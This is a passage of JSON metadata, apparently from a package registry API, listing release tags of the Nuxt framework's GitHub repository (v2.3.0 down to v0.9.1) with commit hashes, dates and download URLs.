","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v